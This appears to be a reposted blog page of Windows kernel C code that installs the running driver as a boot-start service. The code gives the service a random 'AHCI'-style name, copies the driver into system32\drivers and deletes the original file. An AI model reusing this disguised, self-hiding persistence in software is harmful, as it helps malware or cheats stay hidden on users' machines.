LoadDriverRegistry
来源:互联网 发布:ubuntu安装qt5 编辑:程序博客网 时间:2024/05/01 07:19
//设置LoadDriverRegistryNTSTATUS SetLoadDriverRegistry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath){//参数效验if (DriverObject == NULL || RegistryPath == NULL)return STATUS_UNSUCCESSFUL;//定义变量UNICODE_STRING UnicodeValue;UNICODE_STRING SystemRoot;UNICODE_STRING unicodeFilePath;ULONG ulValue;HANDLE hRegister;ULONG ulResult;NTSTATUS ntStatus;HANDLE hFile = NULL;IO_STATUS_BLOCK ioStatus;OBJECT_ATTRIBUTES ObjectAttributes;static wchar_t szDriverFileName[MAX_PATH] = { 0 };static wchar_t szText[MAX_PATH] = { 0 };//设置变量PLDR_DATA_TABLE_ENTRY entry = (PLDR_DATA_TABLE_ENTRY)DriverObject->DriverSection;//打开文件InitializeObjectAttributes(&ObjectAttributes, &entry->FullDllName, OBJ_KERNEL_HANDLE, NULL, NULL);ntStatus = IoCreateFile(&hFile, FILE_READ_ATTRIBUTES, &ObjectAttributes, &ioStatus, 0, FILE_ATTRIBUTE_NORMAL, FILE_SHARE_DELETE, FILE_OPEN, 0, NULL, 0, CreateFileTypeNone, NULL, IO_NO_PARAMETER_CHECKING);if (!NT_SUCCESS(ntStatus))return ntStatus;ZwClose(hFile);UNICODE_STRING NewRegistryPath;UNICODE_STRING strTemp;LARGE_INTEGER current_system_time = { 0 };KeQuerySystemTime(¤t_system_time);ULONG Seed = current_system_time.HighPart;RtlStringCbPrintfExW(szText, sizeof(szText), NULL, NULL, STRSAFE_FILL_BEHIND_NULL, L"\\Registry\\Machine\\System\\CurrentControlSet\\Services\\AHCI%d",(RtlRandomEx(&Seed)+1) % 10000);RtlInitUnicodeString(&strTemp, szText);NewRegistryPath.Length = strTemp.Length ;NewRegistryPath.MaximumLength = strTemp.MaximumLength ;NewRegistryPath.Buffer = (PWSTR)ExAllocatePool(NonPagedPool, NewRegistryPath.MaximumLength);if (NewRegistryPath.Buffer == NULL)return STATUS_UNSUCCESSFUL;RtlZeroMemory(NewRegistryPath.Buffer, NewRegistryPath.MaximumLength);RtlCopyMemory(NewRegistryPath.Buffer, strTemp.Buffer, strTemp.Length);//初始化objectAttributes InitializeObjectAttributes(&ObjectAttributes, &NewRegistryPath, OBJ_CASE_INSENSITIVE, NULL, NULL);//创建或打开注册表项目 ntStatus = ZwCreateKey(&hRegister, KEY_ALL_ACCESS, &ObjectAttributes, NULL, NULL, REG_OPTION_NON_VOLATILE, &ulResult);if (hRegister == NULL || ntStatus != STATUS_SUCCESS) return STATUS_SUCCESS;ZwClose(hRegister);//GroupRtlInitUnicodeString(&UnicodeValue, L"Group");ntStatus = SetValueKey(&NewRegistryPath, &UnicodeValue, REG_SZ, L"Boot Bus Extender");if (!NT_SUCCESS(ntStatus))return ntStatus;//ImagePath//设置ImagePath system32\\drivers\\HelloWorld.sysRtlStringCbPrintfExW(szDriverFileName, sizeof(szDriverFileName), NULL, NULL, STRSAFE_FILL_BEHIND_NULL, L"system32\\drivers\\%s.sys", wcsrchr(NewRegistryPath.Buffer, '\\') + sizeof(char));RtlInitUnicodeString(&UnicodeValue, L"ImagePath");ntStatus = SetValueKey(&NewRegistryPath, &UnicodeValue, REG_SZ, szDriverFileName);if (!NT_SUCCESS(ntStatus))return ntStatus;//拷贝文件到系统目录RtlStringCbPrintfExW(szText, sizeof(szText), NULL, NULL, STRSAFE_FILL_BEHIND_NULL, L"\\SystemRoot\\%s",szDriverFileName);RtlInitUnicodeString(&unicodeFilePath, szText);ntStatus = CopyFile(&entry->FullDllName, &unicodeFilePath);if (NT_SUCCESS(ntStatus)){//删除文件OBJECT_ATTRIBUTES ObAttr = { 0 };InitializeObjectAttributes(&ObAttr, &entry->FullDllName, OBJ_CASE_INSENSITIVE | OBJ_KERNEL_HANDLE, NULL, NULL);ntStatus = ZwDeleteFile(&ObAttr);//if (!NT_SUCCESS(ntStatus))//ForceDeleteFile(&entry->FullDllName);}//DisplayNameRtlInitUnicodeString(&UnicodeValue, L"DisplayName");RtlStringCbPrintfExW(szText, sizeof(szText), NULL, NULL, STRSAFE_FILL_BEHIND_NULL, L"%s", wcsrchr(NewRegistryPath.Buffer, '\\') + sizeof(char));ntStatus = SetValueKey(&NewRegistryPath, &UnicodeValue, REG_SZ, szText);if (!NT_SUCCESS(ntStatus))return ntStatus;//StartRtlInitUnicodeString(&UnicodeValue, L"Start");ulValue = SERVICE_BOOT_START;ntStatus = SetValueKey(&NewRegistryPath, &UnicodeValue, REG_DWORD, &ulValue);if (!NT_SUCCESS(ntStatus))return ntStatus;//TypeRtlInitUnicodeString(&UnicodeValue, L"Type");ulValue = SERVICE_KERNEL_DRIVER;ntStatus = SetValueKey(&NewRegistryPath, &UnicodeValue, REG_DWORD, &ulValue);if (!NT_SUCCESS(ntStatus))return ntStatus;ntStatus=ZwLoadDriver(&NewRegistryPath);if (!NT_SUCCESS(ntStatus))return ntStatus;return STATUS_SUCCESS;}//设置注册表键值NTSTATUS SetValueKey(PUNICODE_STRING pRegPath, PUNICODE_STRING pValueName, ULONG Type, wchar_t ValueData[MAX_PATH]){//参数效验if (pRegPath == NULL || pValueName == 0 || ValueData == NULL)return FALSE;//定义变量size_t pcch = 0;OBJECT_ATTRIBUTES objectAttribues;HANDLE hRegister = NULL;NTSTATUS ntstatus=STATUS_UNSUCCESSFUL;USHORT cbszSize = 0;switch (Type){case REG_SZ:{//获取长度RtlStringCchLengthW(ValueData, MAX_PATH, &pcch);if (pcch <= 0)return FALSE;cbszSize = (USHORT)(pcch* sizeof(wchar_t)) + sizeof(wchar_t);}break;case REG_DWORD:{cbszSize = sizeof(ULONG);}break;default:return STATUS_UNSUCCESSFUL;}//设置变量InitializeObjectAttributes(&objectAttribues, pRegPath, OBJ_CASE_INSENSITIVE, NULL, NULL);//打开注册表ntstatus = ZwOpenKey(&hRegister, KEY_ALL_ACCESS, &objectAttribues);if (!NT_SUCCESS(ntstatus) || hRegister == NULL)return ntstatus;//设置REG_SZ子健ntstatus = ZwSetValueKey(hRegister, pValueName, 0, Type, ValueData, cbszSize);if (!NT_SUCCESS(ntstatus)){//关闭注册表句柄ZwClose(hRegister);return ntstatus;}//关闭注册表句柄ZwClose(hRegister);return ntstatus;}//复制文件NTSTATUS CopyFile(PUNICODE_STRING lpExistingFileName, PUNICODE_STRING lpNewFileName){NTSTATUS Status = STATUS_UNSUCCESSFUL;OBJECT_ATTRIBUTES ObAttr = { 0 };HANDLE hFileSource = NULL;HANDLE hFileDest = NULL;IO_STATUS_BLOCK IoStatus = { 0 };char* pBuff = NULL;ULONG Leng = 0;LARGE_INTEGER Offset = { 0 };do{pBuff = ExAllocatePoolWithTag(PagedPool, 0x1000, 'Tag');if (pBuff == NULL)break;InitializeObjectAttributes(&ObAttr, lpExistingFileName, OBJ_CASE_INSENSITIVE | OBJ_KERNEL_HANDLE, NULL, NULL);Status = ZwOpenFile(&hFileSource, FILE_READ_DATA, &ObAttr, &IoStatus, FILE_SHARE_READ, FILE_NON_DIRECTORY_FILE | FILE_RANDOM_ACCESS | FILE_SYNCHRONOUS_IO_NONALERT);if (!NT_SUCCESS(Status)){hFileDest = NULL;break;}InitializeObjectAttributes(&ObAttr, lpNewFileName, OBJ_CASE_INSENSITIVE | OBJ_KERNEL_HANDLE, NULL, NULL);Status = ZwCreateFile(&hFileDest, GENERIC_WRITE, &ObAttr, &IoStatus, NULL, FILE_ATTRIBUTE_NORMAL, 0, FILE_OVERWRITE_IF, FILE_NON_DIRECTORY_FILE | FILE_RANDOM_ACCESS | FILE_SYNCHRONOUS_IO_NONALERT, NULL, 0);if (NT_ERROR(Status)){hFileDest = NULL;break;}do{Status = ZwReadFile(hFileSource, NULL, NULL, NULL, &IoStatus, pBuff, 0x1000, &Offset, NULL);if (NT_ERROR(Status)){if (STATUS_END_OF_FILE == Status){Status = STATUS_SUCCESS;}break;}Leng = (ULONG)IoStatus.Information;Status = ZwWriteFile(hFileDest, NULL, NULL, NULL, &IoStatus, pBuff, Leng, &Offset, NULL);if (Leng != IoStatus.Information){Status = STATUS_UNSUCCESSFUL;break;}Offset.QuadPart += IoStatus.Information;} while (NT_SUCCESS(Status));} while (FALSE);if (pBuff){ExFreePoolWithTag(pBuff, 'Tag');pBuff = NULL;}if (hFileSource){ZwClose(hFileSource);hFileSource = NULL;}if (hFileDest){ZwClose(hFileDest);hFileDest = NULL;}return Status;} 0 0
- LoadDriverRegistry
- Jacobian矩阵、Hessian矩阵、特征值、特征向量
- 赠券收集者问题
- NOIP模板整理
- java excle导入 导出
- UCRT: VC 2015 Universal CRT, by Microsoft
- LoadDriverRegistry
- [操作系统]自动化集成部署udeployer 批量统一安装一键部署
- Volley中json请求POST
- mysql cmd 窗口乱码
- 欢迎使用CSDN-markdown编辑器
- 牛人(周志华)推荐的人工智能网站
- Encryption raised an exception
- C++primer5th 课后题13.58
- BootStrap 怎样调整<td>的宽度
